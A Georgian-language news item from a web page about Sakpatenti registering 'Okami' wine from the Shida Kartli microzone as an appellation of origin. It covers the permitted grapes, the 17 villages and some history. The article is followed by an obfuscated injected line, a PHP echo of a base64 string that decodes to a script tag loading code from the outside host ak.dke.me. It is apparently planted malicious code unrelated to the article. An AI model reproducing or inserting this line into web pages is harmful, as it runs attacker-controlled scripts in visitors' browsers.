celsiusi
ავერსი შნაიდერი
განსაკუთრებული ქართული პროდუქტებისთვის, გეოგრაფიული აღნიშვნისა და  ადგილწარმოშობის დასახელების სტატუსის მინიჭებას საქართველოში საქპატენტი ახორციელებს. 
გეოგრაფიული აღნიშვნა და ადგილწარმოშობის დასახელება მომხმარებელს აწვდის ინფორმაციას, პროდუქტის წარმომავლობასა და იმ უნიკალურ მახასიათებლებზე, რაც დაკავშირებულია წარმოშობის ადგილთან, რომლის დამახასიათებელი გარემო პირობები და ადგილობრივ მოსახლეობაში არსებული წარმოების ტრადიციული ცოდნა ხდის თითოეულ ასეთ პროდუქტს გამორჩეულს.
ღვინის „ოკამი“ ადგილწარმოშობის დასახელებად რეგისტრაციაზე მუშაობა 2022 წლის 13 აპრილიდან დაიწყო, მას შემდეგ, რაც საქპატენტს აღნიშნული მოთხოვნით „ეთნო ოკამმა“, კავკასიის საერთაშორისო უნივერსიტეტის მეღვინეობამ მიმართა.  „ოკამი“ თეთრი ან წითელი მშრალი ღვინოა, რომელიც შეიძლება დამზადდეს მხოლოდ ოკამის მიკროზონაში, შიდა ქართლის მევენახეობის ზონის ცენტრალურ ნაწილში მოწეული ყურძნის ჯიშებიდან -„ოკამი“ თეთრი შეიძლება დამზადდეს მხოლოდ ჩინურის და/ან გორული მწვანეს ჯიშის ყურძნიდან, ხოლო „ოკამი“ წითელი მხოლოდ შავკაპიტოს ჯიშის ყურძნიდან და დაუშვებელია სხვა ჯიშების გამოყენება. პროდუქტის დამზადების მთლიანი ციკლი უნდა განხორციელდეს მხოლოდ ოკამის მიკროზონის საზღვრებში, რომელიც  შიდა ქართლის რეგიონის 17 სოფელს მოიცავს. ეს  მიკროზონა გამოირჩევა მშრალი სუბტროპიკული ჰავითა და ხელსაყრელი ნიადაგების სტრუქტურით, რაც განაპირობებს ღვინის განსაკუთრებულ მახასიათებლებს. 
აღსანიშნავია, რომ ამ ტიპის ღვინოების დაყენების ადგილობრივი მეთოდების დახვეწასა და განვითარებაში განსაკუთრებული წვლილი მიუძღვის ივანე მუხრანბატონს, რომელმაც მე 19 საუკუნის მეორე ნახევარში საქართველოში მეღვინეობის განვითარების მიზნით ევროპელი სპეციალისტები ჩამოიყვანა. უკვე 1965 წელს კი, თენგიზ კეკელიძის ხელმძღვანელობით, ოკამის ღვინის ქარხანა გაიხსნა.
267
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");